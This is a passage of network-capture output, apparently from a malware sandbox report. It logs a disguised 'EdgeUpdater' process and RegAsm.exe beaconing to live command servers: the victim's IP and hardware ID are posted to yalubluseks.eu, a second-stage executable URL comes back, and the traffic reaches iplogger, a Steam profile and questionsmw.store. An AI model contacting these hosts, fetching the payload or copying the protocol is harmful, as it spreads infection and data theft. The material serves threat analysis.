22	192.168.2.4	49883	104.26.13.205	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:43:33.874979019 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Oct 2, 2024 09:43:34.330405951 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:34 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30fef4b7b0f74-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49885	104.26.13.205	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:43:35.286612034 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:43:35.740046024 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:35 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30ff80c174283-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49888	104.26.13.205	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:44:08.531795979 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Oct 2, 2024 09:44:08.985251904 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:08 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc310c7da2343e0-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 2, 2024 09:44:09.203886986 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:08 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc310c7da2343e0-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49890	104.26.13.205	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:44:09.915111065 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:44:10.614473104 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:10 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc310d0ed0943aa-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 2, 2024 09:44:10.664498091 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:10 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc310d0ed0943aa-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49893	104.26.13.205	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:44:23.504321098 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Oct 2, 2024 09:44:23.979617119 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:23 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc311258cee4246-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 2, 2024 09:44:24.218960047 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:23 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc311258cee4246-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49895	104.26.13.205	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:44:25.176187992 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:44:25.630080938 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:25 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc3112fe87642d8-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	49898	104.26.13.205	80

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:44:44.568547010 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Oct 2, 2024 09:44:45.282424927 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:45 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc311aa6eeb4234-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	49900	104.26.13.205	80

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:44:46.386169910 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:44:46.858632088 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:44:46 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc311b48b4ec334-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	49903	104.26.13.205	80

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:45:02.038887978 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Oct 2, 2024 09:45:02.522160053 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:45:02 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc3121669e74356-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	49905	104.26.13.205	80

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:45:03.487515926 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:45:03.948780060 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:45:03 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc3121f589f0cae-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:00 UTC	170	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue Connection: Keep-Alive
2024-10-02 07:41:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:41:00 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-02 07:41:00 UTC	602	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20NJZYbgwDtr4zUjTRw%2FfGDtI60DOIwowzHtAFbf%2Fr027ZIz7N%2F7hTwA7W0aeNnP6PdZn3TRbLS2LyN4gfmWkMniEVWMBOmSjSbLb4GaelClB6usQj7JlrXxaJWVRlzTuQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30c2c7a161801-EWR
2024-10-02 07:41:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:01 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:41:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:41:01 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 Data Ascii: ip=8.46.123.33&hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1
2024-10-02 07:41:02 UTC	609	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ou5eOi5jHDjmOP%2Fkx1bozvr2tyyBCX6sedIj3Sgz82CyKr94k1Rc7Skong6yHpNTasyS%2Fd1XTU6ETA04myBaNhXrlrJGYBglxawFXjrRh9Ixu%2B03NL9fQq1%2FqjOCU8UWhQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30c35fc5142dc-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:02 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:41:02 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:41:02 UTC	84	OUT	Data Raw: 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1&ip=8.46.123.33
2024-10-02 07:41:03 UTC	662	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kEYloS20xyYRTA881TQzblZ25%2Fm5A5krEB2vobpzcQKWjaKEQBYfKaX9GHS36x%2Bct3VrJT0dexaHzL5oAYCZmuaUFovGG8vlTx3Chhxw%2B8nEL%2Ftncu1fvzza0%2BTVxMIhew%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30c3cd9ecc32c-EWR 32 http://147.45.44.104/ldms/66fb252fe232b_Patksl.exe
2024-10-02 07:41:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49736	104.237.62.213	443	7856	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:09 UTC	202	OUT	GET /?format=json HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: api64.ipify.org
2024-10-02 07:41:09 UTC	156	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:09 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin
2024-10-02 07:41:09 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"ip":"8.46.123.33"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49737	34.117.59.81	443	7856	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:09 UTC	236	OUT	GET /widget/demo/8.46.123.33 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: ipinfo.io
2024-10-02 07:41:10 UTC	458	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 1025 content-type: application/json; charset=utf-8 date: Wed, 02 Oct 2024 07:41:10 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-02 07:41:10 UTC	932	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 Data Ascii: { "input": "8.46.123.33", "data": { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level
2024-10-02 07:41:10 UTC	93	IN	Data Raw: 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d Data Ascii: k Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49748	104.26.2.46	443	7856	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:18 UTC	196	OUT	GET /1nhuM4.js HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: iplogger.org
2024-10-02 07:41:19 UTC	994	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:19 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close memory: 0.4308929443359375 expires: Wed, 02 Oct 2024 07:41:19 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=31536000 x-frame-options: SAMEORIGIN CF-Cache-Status: BYPASS Set-Cookie: 40589004137263905=2; expires=Thu, 02 Oct 2025 07:41:19 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: clhf03028ja=8.46.123.33; expires=Thu, 02 Oct 2025 07:41:19 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wCiOBvIPiBMYhVkZjtGjHe2pl%2Bn98h9gdLDViu6tdzGZ6QTCX30dpujro%2BYu1r%2FqlXoWLkZ93rLJhjbpbTDR20dwBMeSWSPZ%2Fhjhymo8v6qn5VDVJS3w2K7QGH8mqg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30ca00f047d13-EWR
2024-10-02 07:41:19 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-10-02 07:41:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49759	104.102.49.254	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:33 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:33 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 02 Oct 2024 07:41:33 GMT Content-Length: 34879 Connection: close Set-Cookie: sessionid=0e0c478e1eab6ef137c9c7c5; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-02 07:41:33 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-02 07:41:33 UTC	16384	IN	Data Raw: 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
2024-10-02 07:41:33 UTC	3768	IN	Data Raw: 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
2024-10-02 07:41:33 UTC	213	IN	Data Raw: 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49760	172.67.208.141	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:34 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: questionsmw.store
2024-10-02 07:41:34 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:41:34 UTC	772	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hr3ra90c19sncruh275i0s3ttn; expires=Sun, 26 Jan 2025 01:28:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCuJlAWMRlc9R7dy1dqsGsB4ta%2BTbdcjaVnnEtfRXDdiUsapD9x76KqFIHIgGVfuvHPyeEoHlfI52lt4LDpVoRtaUFUqSKcIyvT71Qx%2BXWwaruDH3RpHZTg6RwrXf9Keq5Taeg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30d016a4a8c1e-EWR
2024-10-02 07:41:34 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:41:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49761	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
